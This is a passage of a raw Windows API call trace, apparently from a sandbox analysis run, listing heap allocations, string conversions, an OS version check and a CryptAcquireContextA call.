Size=0x10) returned 0x34aa5f8 [0258.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.366] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0258.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0258.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0258.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.367] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0258.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.368] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0258.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0258.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0258.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0258.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0258.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0258.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.369] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.370] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab68 [0258.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.370] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0258.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.370] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0258.371] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0258.371] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.374] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0258.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0258.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.376] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0258.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0258.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0258.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.376] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0258.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0258.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.377] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0258.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.379] HeapFree (in: hHeap=0x25c0000, 